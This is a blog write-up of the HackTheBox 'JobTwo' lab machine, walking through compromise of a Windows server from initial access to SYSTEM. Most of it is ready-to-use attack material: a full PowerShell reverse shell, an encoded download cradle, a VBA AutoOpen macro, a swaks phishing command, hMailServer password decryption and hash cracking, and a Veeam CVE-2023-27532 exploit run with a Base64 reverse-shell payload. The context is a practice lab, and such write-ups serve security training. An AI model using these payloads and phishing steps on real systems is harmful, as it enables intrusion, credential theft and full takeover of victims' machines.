Yogeshwar Peela

Posted on Jun 26 • Originally published at exploitnotes.hashnode.dev

HackTheBox: JobTwo Writeup

#cybersecurity #hackthebox #activedirectory #writeup

Executive Summary

JobTwo is a Windows Server 2022 machine that simulates a realistic corporate phishing and privilege escalation scenario. The attack chain begins with a job posting website that solicits Word document CVs via email. By crafting a macro-embedded .docm file and sending it to the HR email address, we obtain an initial foothold as user julian. From there, we discover hMailServer installed on the box, extract and crack a password hash from its database to pivot to user ferdinand (user flag). Finally, we exploit CVE-2023-27532 - an unauthenticated credential leak and RCE vulnerability in Veeam Backup & Replication - to execute commands as NT AUTHORITY\SYSTEM and retrieve the root flag.

Reconnaissance
Web Enumeration
Initial Access - VBA Macro Phishing
Stable Shell with ConPtyShell
Post-Exploitation as Julian
Credential Extraction - hMailServer
Lateral Movement to Ferdinand (User Flag)
Privilege Escalation - CVE-2023-27532 (Veeam)
Root Flag
Attack Chain Summary
Key Vulnerabilities

1. Reconnaissance

We start with a full Nmap scan using -A (aggressive mode: OS detection, version detection, script scanning, traceroute) and -Pn (skip host discovery, since ICMP may be blocked):

root@kali:/home/kali/htb/Job2# nmap -A -Pn <TARGET_IP>
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-25 07:56 -0400
Nmap scan report for <TARGET_IP>
Host is up (0.28s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
445/tcp   open  microsoft-ds?
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: JOB2
|   NetBIOS_Domain_Name: JOB2
|   NetBIOS_Computer_Name: JOB2
|   DNS_Domain_Name: JOB2
|   DNS_Computer_Name: JOB2
|   Product_Version: 10.0.20348
|_  System_Time: 2026-06-25T12:57:42+00:00
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager

Key observations:

Port 25 (SMTP) - hMailServer is running, meaning we can send emails directly to the box.
Port 80/443 - a web server is present.
Port 5985 - WinRM is open, useful for lateral movement if we get credentials.
Port 3389 - RDP is open.
OS fingerprinting suggests Windows Server 2022.

We add the hostname to /etc/hosts so domain-based virtual hosting resolves correctly:

echo '<TARGET_IP> job2.vl www.job2.vl' >> /etc/hosts

We then check for anonymous/guest SMB access. Both attempts fail - null sessions and the guest account are disabled:

root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u '' -p ''
SMB  <TARGET_IP>  445  JOB2  [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:None)
SMB  <TARGET_IP>  445  JOB2  [-] JOB2\: STATUS_ACCESS_DENIED

root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u 'guest' -p ''
SMB  <TARGET_IP>  445  JOB2  [*] Windows Server 2022 Build 20348 x64 (name:JOB2) (domain:JOB2) (signing:False) (SMBv1:None)
SMB  <TARGET_IP>  445  JOB2  [-] JOB2\guest: STATUS_ACCOUNT_DISABLED

SMB is a dead end for now. We pivot to the web server.

2. Web Enumeration

Browsing to http://www.job2.vl reveals a boat rental company job posting page. The relevant section reads:

"If you are interested in this position, please send your CV to **hr@job2.vl* as a Microsoft Word Document."*

This is the entry point. The site is explicitly asking for a Word document attachment — a classic phishing vector. The target email is hr@job2.vl and SMTP (port 25) is directly accessible, so we can send mail without any authentication bypass needed.

3. Initial Access - VBA Macro Phishing

How it works

Microsoft Word supports Visual Basic for Applications (VBA) macros embedded inside .docm files. When a victim opens the document and enables macros, the AutoOpen subroutine fires automatically. We abuse this to execute a PowerShell reverse shell payload on the target machine without any user interaction beyond opening the file.

Step 1 — Create the PowerShell reverse shell

We grab a PowerShell reverse shell from revshells.com - specifically the PowerShell #1 option — plugging in our attacker IP and port 4444, then save it as shell.ps1. The payload opens a TCP connection back to our machine, reads commands we send, executes them, and returns the output:

cat shell.ps1

$LHOST = "<YOUR_IP>"
$LPORT = 4444
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT)
$NetworkStream = $TCPClient.GetStream()
$StreamReader = New-Object IO.StreamReader($NetworkStream)
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
$StreamWriter.AutoFlush = $true
$Buffer = New-Object System.Byte[] 1024
while ($TCPClient.Connected) {
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length)
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData - 1)
    }
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }
        $StreamWriter.Write("$Output`n")
        $Code = $null
    }
}
$TCPClient.Close()
$NetworkStream.Close()
$StreamReader.Close()
$StreamWriter.Close()

Step 2 - Base64-encode a download cradle

Instead of embedding the full shell script inside the macro (which could trigger AV signatures), we use a download cradle: the macro tells PowerShell to fetch shell.ps1 from our HTTP server and execute it in memory. We encode the cradle in UTF-16LE Base64 (the format PowerShell's -EncodedCommand flag expects):

cmd='IEX(New-Object Net.WebClient).DownloadString("http://<YOUR_IP>/shell.ps1")'
echo -n "$cmd" | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADwAWQBPAFUAUgBfAEkAUAA+AC8AcwBoAGUAbABsAC4AcABzADEAIgApAA==

Replace <YOUR_IP> with your own attacker IP and re-run the encoding to get your own base64 string.

Step 3 - Create the malicious Word document

This step requires a Windows machine with Microsoft Word (Microsoft 365 or an activated license - a trial VM works fine). The VBA project name in the editor will match your .docm filename, so if you save as Doc1.docm, the project will show as Project (evil) in the VBA editor.

Open Word → create a new .docm file, save it as evil.docm.
Go to View → Macros, type AutoOpen in the macro name box → click Create.
In the VBA editor, right-click Project (evil) in the left pane → Insert → Module.
Paste the following macro into the module. AutoOpen fires when macros are enabled on open; Document_Open is a fallback for some Word versions:

Sub AutoOpen()
    Shell "powershell -nop -w hidden -ep bypass -e <YOUR_BASE64_HERE>", vbHide
End Sub
Sub Document_Open()
    AutoOpen
End Sub

Save as evil.docm (macro-enabled Word document format).

Note: Microsoft 365 or an activated Word license is required to save and embed macros. If unavailable, a Windows VM with a trial/activated copy works fine.

Step 4 - Host the payload and set up the listener

On our attacker machine, we serve shell.ps1 over HTTP and start a Netcat listener:

python3 -m http.server 80

rlwrap -cAr nc -lnvp 4444

(rlwrap adds readline support for arrow keys and history in the shell.)

Step 5 — Send the phishing email

We use swaks (Swiss Army Knife for SMTP) to send the malicious document directly to hr@job2.vl via the open SMTP server on port 25. No authentication is required:

swaks \
  --to hr@job2.vl \
  --from exploit@notes.com \
  --header 'Subject: Job Application' \
  --body "Please review my resume" \
  --attach @evil.docm \
  --server <TARGET_IP>

=== Trying <TARGET_IP>:25...
=== Connected to <TARGET_IP>.
<-  220 JOB2 ESMTP
 -> EHLO kali
<-  250-JOB2
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<exploit@notes.com>
<-  250 OK
 -> RCPT TO:<hr@job2.vl>
<-  250 OK
 -> DATA
<-  354 OK, send.
[... base64 encoded attachment ...]
<** 250 Queued (35.408 seconds)
=== Connection closed with remote host.

Note on timeouts: The connection may show a timeout waiting for server response, but as long as the email is queued (250 Queued), the payload will execute. The server-side mail processor opens the document automatically.

Shortly after sending, our HTTP server receives a request for shell.ps1, and our listener catches the callback:

<TARGET_IP> - - [26/Jun/2026 06:38:56] "GET /shell.ps1 HTTP/1.1" 200 -

rlwrap -cAr nc -lnvp 4444
listening on [any] 4444 ...
connect to [<YOUR_IP>] from (UNKNOWN) [<TARGET_IP>] 57097

hostname
JOB2

We have a shell as job2\julian.

4. Stable Shell with ConPtyShell

The initial Netcat shell is limited - no tab completion, no arrow keys, and commands like clear can break it. We upgrade to a full interactive PTY shell using ConPtyShell, which uses the Windows ConPTY API to provide a proper terminal experience.

Clone the tool and host it:

git clone https://github.com/antonioCoco/ConPtyShell.git
cd ConPtyShell
python3 -m http.server 8000

On the target, download and invoke the script, pointing it at our new listener on port 4445:

IEX (iwr http://<YOUR_IP>:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing)
Invoke-ConPtyShell <YOUR_IP> 4445

Start the ConPtyShell listener on our end:

stty raw -echo
( stty size; cat ) | nc -lvnp 4445
listening on [any] 4445 ...
connect to [<YOUR_IP>] from (UNKNOWN) [<TARGET_IP>] 65203

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\WINDOWS\system32>

We now have a fully interactive Windows PowerShell session.

5. Post-Exploitation as Julian

We enumerate our current user's privileges and context:

PS C:\> whoami
job2\julian

PS C:\> whoami /all

USER INFORMATION
----------------
User Name   SID
=========== ==============================================
job2\julian S-1-5-21-3935782767-3829597994-1046841959-1000

GROUP INFORMATION
-----------------
Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
...
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Julian is a standard low-privilege user — Medium Integrity, no useful privileges like SeImpersonatePrivilege. We check the filesystem for other users and interesting directories:

PS C:\Users> net user

User accounts for \\JOB2
-------------------------------------------------------------------------------
Administrator  DefaultAccount  Ferdinand
Guest          Julian          svc_veeam
WDAGUtilityAccount

Three notable accounts: Ferdinand, Administrator, and a service account svc_veeam. Trying to access Ferdinand's directory is denied:

PS C:\Users> cd .\Ferdinand\
dir : Access to the path 'C:\Users\Ferdinand' is denied.

We browse C:\Program Files (x86) and find hMailServer — the same mail server we exploited via SMTP. Crucially, hMailServer stores account credentials in a local database, which may contain passwords we can crack.

PS C:\Program Files (x86)> dir
...
d-----  5/3/2023  1:48 PM   hMailServer
d-----  5/3/2023  6:47 PM   Veeam
...

6. Credential Extraction — hMailServer

Reading the config file

hMailServer stores its database connection settings in a plaintext .INI file, including an encrypted database password:

PS C:\Program Files (x86)\hMailServer\Bin> type hMailServer.INI

[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e

[Database]
Type=MSSQLCE
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1

The Password field is encrypted with hMailServer's proprietary Blowfish-based encryption.

Decrypting the database password

We use hMailDatabasePasswordDecrypter, a tool that reverses hMailServer's known encryption scheme:

root@kali:~# git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
root@kali:~# cd hMailDatabasePasswordDecrypter
root@kali:~# make
g++ blowfish.cpp main.cpp -o decrypt
root@kali:~# chmod +x decrypt
root@kali:~# ./decrypt 4e9989caf04eaa5ef87fd1f853f08b62
95C02068FD5D

The decrypted database password is 95C02068FD5D.

Opening the hMailServer database

hMailServer uses a SQL Server Compact Edition (.sdf) database file. We need to open it using the correct version of the SqlServerCe DLL.

First, we copy the database to a writable location (the original is locked by the running service):

PS C:\Program Files (x86)\hMailServer\Bin> Copy-Item "C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf" C:\temp\

Attempting to open it with the v4.0 DLL fails with a version mismatch error, so we use the older v3.5 DLL which matches the database format:

# Start a fresh PowerShell session to avoid DLL conflicts from a previous attempt
Add-Type -Path "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\System.Data.SqlServerCe.dll"
$conn = New-Object System.Data.SqlServerCe.SqlCeConnection
$conn.ConnectionString = "Data Source=C:\temp\hMailServer.sdf;Password=95C02068FD5D"
$conn.Open()

PS C:\Program Files (x86)\hMailServer\Bin> $conn.State
Open

Querying the database for user credentials

We enumerate available tables:

$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT table_name FROM information_schema.tables"
$r = $cmd.ExecuteReader()
while($r.Read()){ $r[0] }

hm_accounts
hm_domains
hm_settings
...

We identify the relevant columns in hm_accounts by reading the schema:

$cmd.CommandText = "SELECT * FROM hm_accounts"
$r = $cmd.ExecuteReader()
for($i=0;$i -lt $r.FieldCount;$i++){ $r.GetName($i) }

accountid
accountaddress
accountpassword
accountpwencryption
...

We extract email addresses and their password hashes:

$cmd.CommandText = "SELECT accountaddress, accountpassword FROM hm_accounts"
$r = $cmd.ExecuteReader()
while($r.Read()){ "$($r[0]) : $($r[1])" }

Julian@job2.vl    : 8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f
Ferdinand@job2.vl : 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
hr@job2.vl        : 1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055

Cracking the hashes with John the Ripper

hMailServer stores passwords in the format sha256($salt.$password) — John the Ripper recognises this as the hMailServer hash type. We save the hashes and run them against rockyou.txt:

cat > users.hash << 'EOF'
Julian@job2.vl:8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f
Ferdinand@job2.vl:04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
hr@job2.vl:1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055
EOF

john users.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (hMailServer [sha256($s.$p) 256/256 AVX2 8x])
Franzi123!       (Ferdinand@job2.vl)
1g 0:00:00:05 DONE (2026-06-26 09:29) 0.1792g/s 2570Kp/s
Session completed.

Ferdinand's password is Franzi123!.

7. Lateral Movement to Ferdinand (User Flag)

We verify the credentials work for WinRM (port 5985) using NetExec:

nxc winrm <TARGET_IP> -u Ferdinand -p 'Franzi123!'
WINRM  <TARGET_IP>  5985  JOB2  [+] JOB2\Ferdinand:Franzi123! (Pwn3d!)

(Pwn3d!) confirms Ferdinand can use WinRM. We connect with Evil-WinRM:

evil-winrm -i <TARGET_IP> -u Ferdinand -p 'Franzi123!'

Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ferdinand\Documents>

We grab the user flag from Ferdinand's Desktop:

*Evil-WinRM* PS C:\Users\Ferdinand\Desktop> dir

    Directory: C:\Users\Ferdinand\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/26/2026  12:29 PM             34 user.txt

*Evil-WinRM* PS C:\Users\Ferdinand\Desktop> type user.txt
[REDACTED]

Ferdinand's group memberships confirm he has Remote Management Users access but no elevated privileges — we need to find another path to SYSTEM.

8. Privilege Escalation — CVE-2023-27532 (Veeam)

Discovery

While browsing C:\Program Files (x86), we spot a Veeam installation directory. We verify the version by checking the file version info of the Veeam console executable:

[System.Diagnostics.FileVersionInfo]::GetVersionInfo("C:\Program Files\Veeam\Backup and Replication\Console\veeam.backup.shell.exe").FileVersion
10.0.1.4854

Version 10.0.1.4854 corresponds to Veeam Backup & Replication v11, which is vulnerable to CVE-2023-27532.

What is CVE-2023-27532?

CVE-2023-27532 is a critical vulnerability in Veeam Backup & Replication. The Veeam backup service exposes a Windows Communication Foundation (WCF) endpoint on TCP port 9401 with no client authentication (clientCredentialType="None"). This allows any unauthenticated user on the network to:

Extract plaintext credentials for every account stored in the Veeam configuration database (backup infrastructure hosts, admin accounts, etc.).
Achieve remote code execution as NT AUTHORITY\SYSTEM by leveraging an exposed SQL query interface that can enable and call xp_cmdshell.

This was exploited in the wild by ransomware groups targeting enterprise backup infrastructure.

Exploitation

We use a public PoC: CVE-2023-27532-RCE-Only. The tool connects to port 9401 and uses the GetDataTable method to execute arbitrary SQL that enables and calls xp_cmdshell.

Clone on our attacker machine and host via Python HTTP server:

git clone https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
cd CVE-2023-27532-RCE-Only
python3 -m http.server 8000

The exploit requires three supporting DLLs from the Veeam installation alongside the executable. Download all four files to C:\temp on the target:

*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/VeeamHax.exe -OutFile C:\temp\VeeamHax.exe
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/Veeam.Backup.Common.dll -OutFile C:\temp\Veeam.Backup.Common.dll
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/Veeam.Backup.Model.dll -OutFile C:\temp\Veeam.Backup.Model.dll
*Evil-WinRM* PS C:\temp> iwr http://<YOUR_IP>:8000/Veeam.Backup.Interaction.MountService.dll -OutFile C:\temp\Veeam.Backup.Interaction.MountService.dll

Our HTTP server confirms all files were fetched:

<TARGET_IP> - - [26/Jun/2026 11:03:09] "GET /VeeamHax.exe HTTP/1.1" 200 -
<TARGET_IP> - - [26/Jun/2026 11:03:10] "GET /Veeam.Backup.Common.dll HTTP/1.1" 200 -
<TARGET_IP> - - [26/Jun/2026 11:03:13] "GET /Veeam.Backup.Model.dll HTTP/1.1" 200 -
<TARGET_IP> - - [26/Jun/2026 11:03:18] "GET /Veeam.Backup.Interaction.MountService.dll HTTP/1.1" 200 -

We test the exploit without arguments to confirm it reaches the Veeam service on 127.0.0.1:9401:

*Evil-WinRM* PS C:\temp> .\VeeamHax.exe
Targeting 127.0.0.1:9401

Now we pass our reverse shell payload (a base64-encoded PowerShell reverse shell pointing to port 3333 on our machine) via the --cmd flag. The exploit instructs Veeam's SQL backend to run xp_cmdshell with our command — executing as the Veeam service account which runs as NT AUTHORITY\SYSTEM:

*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMgAyADMAIgAsADMAMwAzADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Targeting 127.0.0.1:9401

Our listener catches the shell:

PS C:\WINDOWS\system32> whoami
nt authority\system

We are now NT AUTHORITY\SYSTEM.

9. Root Flag

PS C:\WINDOWS\system32> cd C:\Users\Administrator\Desktop

PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk
-ar---         6/26/2026  12:29 PM             34 root.txt

PS C:\Users\Administrator\Desktop> type root.txt
[REDACTED]

10. Attack Chain Summary

[Attacker]
    │
    ├─ 1. Nmap scan → discovers SMTP (25), HTTP (80/443), WinRM (5985), Veeam (9401)
    │
    ├─ 2. Web enum → job posting at www.job2.vl → "Send CV to hr@job2.vl as Word document"
    │
    ├─ 3. Craft malicious .docm with VBA AutoOpen macro
    │      └─ Macro: PowerShell downloads & executes shell.ps1 from attacker HTTP server
    │
    ├─ 4. swaks sends .docm to hr@job2.vl via open SMTP (port 25)
    │      └─ Mail bot opens document → macro fires → reverse shell
    │
    ├─ 5. Shell as job2\julian (Medium integrity, no useful privs)
    │
    ├─ 6. Enumerate filesystem → hMailServer found in Program Files (x86)
    │      ├─ Read hMailServer.INI → encrypted DB password
    │      ├─ Decrypt with hMailDatabasePasswordDecrypter → 95C02068FD5D
    │      ├─ Copy .sdf DB to C:\temp, open with SqlServerCe v3.5
    │      └─ Query hm_accounts → extract SHA256 password hashes
    │
    ├─ 7. John the Ripper cracks Ferdinand's hash → Franzi123!
    │
    ├─ 8. evil-winrm as Ferdinand → user.txt [REDACTED]
    │
    ├─ 9. Discover Veeam Backup & Replication v11.0.1.4854 (vulnerable to CVE-2023-27532)
    │
    ├─ 10. CVE-2023-27532 PoC → unauthenticated RCE via Veeam WCF endpoint (port 9401)
    │       └─ xp_cmdshell → PowerShell reverse shell as NT AUTHORITY\SYSTEM
    │
    └─ 11. root.txt [REDACTED]

11. Key Vulnerabilities

#	Vulnerability	Impact	CVSS
1	Open SMTP relay (no auth) — hMailServer accepts unauthenticated mail from any sender to internal addresses	Enables phishing without credentials	N/A
2	VBA Macro execution — mail bot opens attachments with macros enabled and no AV enforcement	Remote code execution via phishing	N/A
3	hMailServer password storage — account passwords stored as crackable SHA-256 hashes, DB password stored in plaintext-adjacent INI	Credential theft → lateral movement	N/A
4	CVE-2023-27532 — Veeam Backup & Replication WCF endpoint on port 9401 with no client authentication	Unauthenticated RCE as SYSTEM via `xp_cmdshell`	7.5 (High)

DEV Community